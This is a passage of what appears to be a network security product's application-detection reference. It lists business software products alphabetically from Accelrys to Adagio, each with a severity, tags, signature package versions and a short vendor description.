Description: AccelOps provides analytics-driven IT Operations Management for cloud and virtualized infrastructures. The virtual appliance software manages security, network performance and compliance, all on a single screen.
Back to top

Accelrys

About this situation: Application Accelrys detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Accelrys provides software for scientific enterprise software for chemical, materials and bioscience research especially in the areas of drug discovery and materials science.
Back to top

AccentiaTechnologies

About this situation: Application AccentiaTechnologies detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AccentiaTechnologies Limited provides business process management solutions for healthcare, financial, and insurance sectors. It offers medical billing and coding, insurance claim processing, receivables management
Back to top

Accenture-CAS

About this situation: Application Accenture-CAS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Accenture CAS is a trade promotion management and optimization software, combines an integrated suite of customer management and mobility software to improve sales performance for consumer goods companies.
Back to top

Acceo

About this situation: Application Acceo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: ACCEO specialize in software design, implementation, integration, and support for the fields of management, accounting, and e-business development.
Back to top

Accept360

About this situation: Application Accept360 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Accept Software solves complex product planning with collaborative solutions for requirements, ideas, strategy and product portfolios, and agile processes.
Back to top

Acceptiva-for-Nonprofits

About this situation: Application Acceptiva-for-Nonprofits detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Acceptiva enables your non profit to accept Payments and Donations Online simply and easily.
Back to top

Acceptum-Business-Software

About this situation: Application Acceptum-Business-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Acceptum is a Business Software desktop business management and accounts software solution.
Back to top

Access-Freightliner

About this situation: Application Access-Freightliner detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Daimler Trucks North America LLC is an automotive industry manufacturer. The AccessFreightliner designed for use by Freightliner
Back to top

AccessGroup

About this situation: Application AccessGroup detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AccessGroup provides integrated business management software. The portfolio spans solutions for ERP, finance, HR, Payroll, warehousing, business intelligence, professional service automation and manufacturing.
Back to top

AccessPatrol

About this situation: Application AccessPatrol detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AccessPatrol provides a proactive solution for securing company endpoints
Back to top

Acclaris

About this situation: Application Acclaris detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Acclaris transforms the administration of consumer-driven healthcare for health plans, financial institutions, TPAs and Benefits
Back to top

Accommodations-Plus-International

About this situation: Application Accommodations-Plus-International detected
Context: Application Context
Severity: 1
Tags: Web Applications, Travel and Expense
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Accommodations Plus International
Back to top

Accompa

About this situation: Application Accompa detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Accompa, Inc. is a provider of cloud-based software under two brands
Back to top

Accountable

About this situation: Application Accountable detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Accountable is a platform designed to help organizations manage HIPAA compliance.
Back to top

Accountants-Office

About this situation: Application Accountants-Office detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: MYOB Accountants Office suite provides common accounting tools allowing configuration, reporting and simplified workflows.
Back to top

AccountEdge

About this situation: Application AccountEdge detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AccountEdge is small business accounting software for Mac, Windows, and Mobile. Its command centers help run and report on aspects of business
Back to top

Accounting-ASAP

About this situation: Application Accounting-ASAP detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Accounting ASAP provides simple to use web based accounting software for small business.
Back to top

AccountMate

About this situation: Application AccountMate detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AccountMate is a provider of modifiable source code accounting software and business management solutions for Small and Mid-Sized Businesses.
Back to top

AccounTrex

About this situation: Application AccounTrex detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AccounTrex back office and portfolio management software designed for funds that include syndicate trading in their strategy.
Back to top

AccountSight

About this situation: Application AccountSight detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AccountSight is a time tracking, resource planning and billing software on cloud.
Back to top

AccountsIQ

About this situation: Application AccountsIQ detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: accountsIQ is a Cloud Accounting software provider that develops and supports a highly functional Cloud accounting and business application which is delivered 24-7 via the Internet.
Back to top

AccountsPortal

About this situation: Application AccountsPortal detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AccountsPortal offers to manage invoicing, books and accounts.
Back to top

Accruent

About this situation: Application Accruent detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Accruent is a estate management system offering software for commercial property management, asset management and facility management.
Back to top

Acct1st-DMS

About this situation: Application Acct1st-DMS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Acct1st technology group provides document and records management specifically for CPA and accounting organization.
Back to top

AccuBuild

About this situation: Application AccuBuild detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AccuBuild is a provider of Business Management Software for General Contractors and Specialty Sub-Contractors.
Back to top

AccuConference

About this situation: Application AccuConference detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AccuConference is a provider of global conference call services and video conferencing solutions.
Back to top

Acculynx

About this situation: Application Acculynx detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AccuLynx is a cloud-based construction management software designed with the Specialty Trade Contractor in mind.
Back to top

Accumulus-Subscription-and-Usage-Billing

About this situation: Application Accumulus-Subscription-and-Usage-Billing detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Accumulus provides you with an agile back-office and subscription management for your recurring business in the cloud. You can automate the entire customer lifecycle from signups to cancellations, utilize and evolve recurring pricing strategies for your products from subscriptions to usage based pricing, and gain visibility into how your offers, promotions and reseller channels are doing.
Back to top

Accuplus-3PL

About this situation: Application Accuplus-3PL detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: The Accuplus Integrated Distribution Logistics System is the 3rd Party Logistics industrys mainstay warehouse system. Accuplus is a comprehensive software package for managing 3rd Party Warehouse operations.
Back to top

AccuPOS

About this situation: Application AccuPOS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AccuPOS Point of Sale provides a windows-based POS solution for QuickBooks, Sage, Peachtree or Simply Accounting users that operate in a retail or restaurant environment.
Back to top

Accurants

About this situation: Application Accurants detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Accurants empowers your business through a single, integrated, cloud-based platform for all your invoicing, time tracking, and project management needs.
Back to top

Accusoft

About this situation: Application Accusoft detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Accusoft provides a full spectrum of document viewing solutions as fully supported, best-in-class client-server apps, mobile apps, cloud services and SDKs.
Back to top

Accusystems

About this situation: Application Accusystems detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AccuSystems develops and markets bank imaging software for community and regional banks. AccuSystems platforms provide bank document imaging and document management for both loan files and bank operations documents.
Back to top

Accuvio-Sustainability

About this situation: Application Accuvio-Sustainability detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Accuvio is a developer of sustainability software, with a focused specialisation in designing clear, simplified solutions for the most complex problems
Back to top

Ace-of-Sales

About this situation: Application Ace-of-Sales detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Ace of Sales is a cloud based sales CRM that is feature packed with new sales, marketing and relationship building tools and training to help salespeople attract, engage, differentiate, thank, stay in touch, and WOW customers.
Back to top

Aceproject

About this situation: AceProject usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: AceProject offers a collection of features pulling from the best of professional project management applications, such as Microsoft Project, in a more simple to use task management system. With AceProject Streamline the project management process by viewing and reporting progress across your entire portfolio.
Back to top

AceRoute

About this situation: Application AceRoute detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: AceRoute is a comprehensive Field Service Management solution that incorporates artificial intelligence and smart decision-making algorithms
Back to top

Achieve3000

About this situation: Application Achieve3000 detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Achieve3000 is provider of differentiated instruction, preparing students for success.
Back to top

AchieveIt

About this situation: Application AchieveIt detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AchieveIt Execution Insight Platform is a web-based software solution that was purpose-built to solve the problems of planning and strategy execution.
Back to top

Acid-Library

About this situation: Application Acid-Library detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Acid Library is a High Performance Math Parser for the Net Framework.
Back to top

Acision

About this situation: Application Acision detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Acision connects the world by powering relevant, seamless mobile engagement services which interoperate across all IP platforms and enrich the end user experience. Acision's proven products, continued people enable Operators and Enterprises to translate business challenges into new opportunities in today's disruptive mobile ecosystem.
Back to top

ACIWorldwide

About this situation: Application ACIWorldwide detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ACIWorldwide is a payment systems company, powers e-payments and banking for financial institutions, retailers and billers. Through software products and hosted services, it delivers a range of solutions for payments processing
Back to top

Acloud-Communicate

About this situation: aCloud Communicate usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: aCloud delivers intuitive solutions that connect seamlessly with your Access on-premise world. A constantly evolving portfolio of applications focusing on self-service, collaboration, employee engagement, process improvement and mobility.
Back to top

AcMP

About this situation: Application AcMP detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AcMP is a MRO software for General Aviation. It will support you in all your daily activities such as
Back to top

ACN-Opportunity

About this situation: Application ACN-Opportunity detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ACN- is the direct selling telecommunications and essential services
Back to top

Acobot

About this situation: Application Acobot detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Acobot is a chatbot that helps website owners answer questions from visitors, and convert them into buying clients.
Back to top

Aconex

About this situation: Application Aconex detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Aconex provides cloud solutions for managing project-wide information and processes in engineering and construction.
Back to top

Acquia

About this situation: Application Acquia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Acquia is a software-as-a-service company providing products, services, and technical support for open-source web content management platform Drupal.
Back to top

AcquireTM

About this situation: Application AcquireTM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AcquireTM is web-based applicant tracking and recruiting software.
Back to top

Acquisio

About this situation: Application Acquisio detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Acquisio is a performance media platform that enables marketers to optimize the results of search, social, mobile and display marketing.
Back to top

Acrobat.com

About this situation: Acrobat.com usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-419-4219
Last changed: sgpkg-ips-1706-5242
Description: Acrobat.com is a suite of web applications from Adobe Systems that allows users to create, collaborate on and share documents, tables, and presentations; hold online meetings with others; convert files to PDF online; upload and share a variety of files with others; and manage and collaborate in online workspaces.
Back to top

Acrodex

About this situation: Application Acrodex detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Acrodex Inc. is a provider of strategic IT services designed specifically for large-enterprise and mid-tier organizations. Acrodex solution-based services are founded on mature internal competencies in technology provisioning, enterprise software licensing, managed operations, IT infrastructure, network solutions, web application development, and project management.
Back to top

Acromobile

About this situation: Application Acromobile detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Acromobile helps companies leverage mobile and social media channels to improve customer experience, deliver more value, and drive revenue.
Back to top

Acronis

About this situation: Application Acronis detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Acronis develops on-premises and cloud software for backup, disaster recovery, and secure file sync and share and data access.
Back to top

Acrotime

About this situation: Application Acrotime detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AcroTime offers complete end-to-end workforce management, including time tracking, payroll processing, scheduling and human resources management tools.
Back to top

Act-isure

About this situation: Application Act-isure detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Act-isure is a health and protection insurance application software
Back to top

Act-On-Software

About this situation: Application Act-On-Software detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Act-On Software is a cloud based integrated marketing platform for organizations.
Back to top

Acteva

About this situation: Application Acteva detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Acteva is the largest and fastest growing global software company, providing Event Registration, Class Registration and Attendee Relationship Management solutions
Back to top

Actian

About this situation: Application Actian detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Actian empowers companies of all sizes to connect to data of any type, size or location; analyze it quickly wherever it resides; and take immediate action on accurate insights gained to delight their customers, gain competitive advantage, manage risk and find new sources of income.
Back to top

Actiance

About this situation: Application Actiance detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Actiance, a unified communication, collaboration, and social media governance for the enterprise solution provider, offers a one-stop platform that helps you manage all social media channels.
Back to top

Actimind-actiTIME

About this situation: Actimind actiTIME usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-628-5211
Description: actiTIME is web-based time tracking service.
Back to top

Actindo

About this situation: Application Actindo detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Actindo is a computer software company which provides Cloud ERP - a comprehensive automation of all processes in trade
Back to top

Action-Method

About this situation: Application Action-Method detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Action Method is an exploratory task-management product
Back to top

ActionBridge

About this situation: Application ActionBridge detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Nimaya's ActionBridge enables users of SaaS-based applications to proactively alert and prompt sales and support staff to sales leads and risks via the automated creation of tasks, events and leads based on data residing within and external to their hosted solutions.
Back to top

ActionHRM

About this situation: Application ActionHRM detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ActionHRM provides HR management software that helps small and midsize companies increase employee productivity, improve compliance, and reduce HR costs.
Back to top

Actionspace

About this situation: Application Actionspace detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Actionspace is a software vendor of enterprise task management and simple project management solutions tailored for Microsoft Office 365 and Microsoft SharePoint.
Back to top

ActionStep

About this situation: Application ActionStep detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Actionstep is online management solution, that gives you the tools you need to you get sales, get your work done and get paid, all in a single application that is accessible from anywhere.
Back to top

actiPLANS

About this situation: Application actiPLANS detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: actiPLANS is an online tool that provides a clear view on the corporate work schedule and shows who and when is taking a leave.
Back to top

Activ-Absence

About this situation: Application Activ-Absence detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1119-5242
Last changed: sgpkg-ips-1160-5242
Description: Activ Absence uses the latest cloud based self-service software to effectively co-ordinate staff holidays and absence online within a small business an across multiple office locations worldwide.
Back to top

ActivClient

About this situation: Application ActivClient detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: HID Globals ActivID ActivClient software guards against an ever-changing threat landscape by providing organizations with risk-appropriate and secure access to corporate IT assets.
Back to top

Active-logistics

About this situation: Application Active-logistics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Active logistics has developed IT solutions in the fields of logistics. More than 230 specialists work for Active logistics and they are well experienced in the special features of the logistic business
Back to top

Active-Net

About this situation: Active Net usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Miscellaneous, Application Routing
First detected in: sgpkg-ips-629-5211
Last changed: sgpkg-ips-1764-5242
Description: a Web and Article Directory. Search internet resources, search engine optimization, products, services and information, fast and easy on Active Net.
Back to top

Active-Network-Giving

About this situation: Active Network Giving usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-629-5211
Description: Active Network Giving provides Technology Solutions, Marketing Solutions, Fundraising Software and Charity Website.
Back to top

Active-Works/results

About this situation: ACTIVE Works/Results usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-626-5211
Last changed: sgpkg-ips-1764-5242
Description: ACTIVE Works allows event organizers to import and sync participant registration data directly into SalesForce. Active Results is source for race results for thousands of endurance events.
Back to top

ActiveCampaign

About this situation: Application ActiveCampaign detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Marketing, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ActiveCampaign is email marketing software features that allow create email marketing and HTML newsletter campaigns.
Back to top

Activecollab

About this situation: activeCollab usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: activeCollab Manage projects, track time, and bill your clients with one easy to use collaboration tool. With activeCollab creating new tasks is quick and easy. You can also attach files, set due dates, add reminders, leave comments, and stay notified about updates.
Back to top

ActiveConversion

About this situation: Application ActiveConversion detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ActiveConversion allows do more marketing with fewer resources and is more cost effective than comparable products.
Back to top

ActiveDocs-Opus

About this situation: Application ActiveDocs-Opus detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ActiveDocs Opus is document creation software built on Microsoft technology. Whether your document content comes from a single source or from a variety of content owners, ActiveDocs Opus facilitates the capture, assembly and delivery of this content through a range of document channels, from hard copy, electronically or in a sophisticated presentation format.
Back to top

ActiveInterview

About this situation: Application ActiveInterview detected
Context: Application Context
Severity: 1
Tags: Cloud Services, HR, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Active Interview is video interviewing software. Make faster placement and save money using web-based video interviews.
Back to top

ActiveMetrics

About this situation: Application ActiveMetrics detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: PureShare ActiveMetrics performance metrics software is a day-to-day management tool. It eliminates the need for managing and generating manual reports by providing direct access to performance metrics, business metrics and reporting metrics.
Back to top

ActivePDF-Server

About this situation: Application ActivePDF-Server detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Storage, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ActivePDF offers enterprise-class PDF tools. Server-based software for secure high-fidelity PDF creation, batch conversion, edit, print and view capabilities.
Back to top

ActivePoint

About this situation: Application ActivePoint detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ActivePoint enables companies create Online and Printable DIY Product Catalogs, Digital publications using simple, cost- effective online interactive software.
Back to top

ActiveReports-Server

About this situation: Application ActiveReports-Server detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ActiveReports Server is web-based ad hoc reporting software designed for deploying self-service BI
Back to top

ActiVia

About this situation: Application ActiVia detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ActiVia supports challenging video-on-demand, iptv, software push, data replication or digital cinema applications.
Back to top

ActivityHero

About this situation: Application ActivityHero detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Social Networking, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ActivityHero is a marketplace for kids' camps and after school classes.
Back to top

ActivTrak

About this situation: Application ActivTrak detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: ActivTrak is cloud-based employee monitoring service. By tracking application and web usage, it allows you to answer the question - Who's doing what and for how long.
Back to top

Activu

About this situation: Application Activu detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Activu Corporation is a software and services company delivering innovative visualization and collaboration solutions for mission-critical command and control environments.
Back to top

AcTouch.com

About this situation: Application AcTouch.com detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: AcTouch helps the Business owners and Entrepreneurs in managing their Accounting and bookkeeping work and manage their Business, Cash management and Financial controls.
Back to top

Actua

About this situation: Application Actua detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Actua brings is the cloud company that provides to industry vertical markets, including government, compliance, wealth management and insurance.
Back to top

Acuity-Scheduling

About this situation: Application Acuity-Scheduling detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Office, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Acuity Scheduling is an online appointment scheduling software. Clients schedule appointments, pay, and complete intake forms online 24
Back to top

Acumatica

About this situation: Application Acumatica detected
Context: Application Context
Severity: 1
Tags: Cloud Services, ERP/CRM, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Acumatica is a provider of cloud business management software that empowers small and mid-size businesses to unlock their potential and drive growth. Built on the world's cloud and mobile technology and a customer-centric licensing model, Acumatica delivers a suite of fully integrated business management applications such as Financials, Distribution, CRM and Project Accounting, powered by a robust and flexible platform.
Back to top

Acunote

About this situation: Acunote usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Office, Application Routing
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1764-5242
Description: Acunote is a project management and Scrum software that is fast and easy to use, shows actual progress, not just wishful thinking, provides powerful analytics for data-driven management, and that is more than just Scrum: project management and collaboration for the whole company.
Back to top

Acute

About this situation: Acute usage detected
Context: Application Context
Severity: 1
Tags: Web Applications, Health, Application Routing
First detected in: sgpkg-ips-938-5242
Last changed: sgpkg-ips-1238-5242
Description: Acute is a patient and medical data management system.
Back to top

Acxiom

About this situation: Application Acxiom detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Miscellaneous, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
Description: Acxiom is an enterprise data, analytics, and software as a service company that uniquely fuses trust, experience and scale to fuel data-driven results.
Back to top

Adagio-Financial-Suite

About this situation: Application Adagio-Financial-Suite detected
Context: Application Context
Severity: 1
Tags: Cloud Services, Finance, Application Routing
First detected in: sgpkg-ips-1041-5242
Last changed: sgpkg-ips-1678-5242
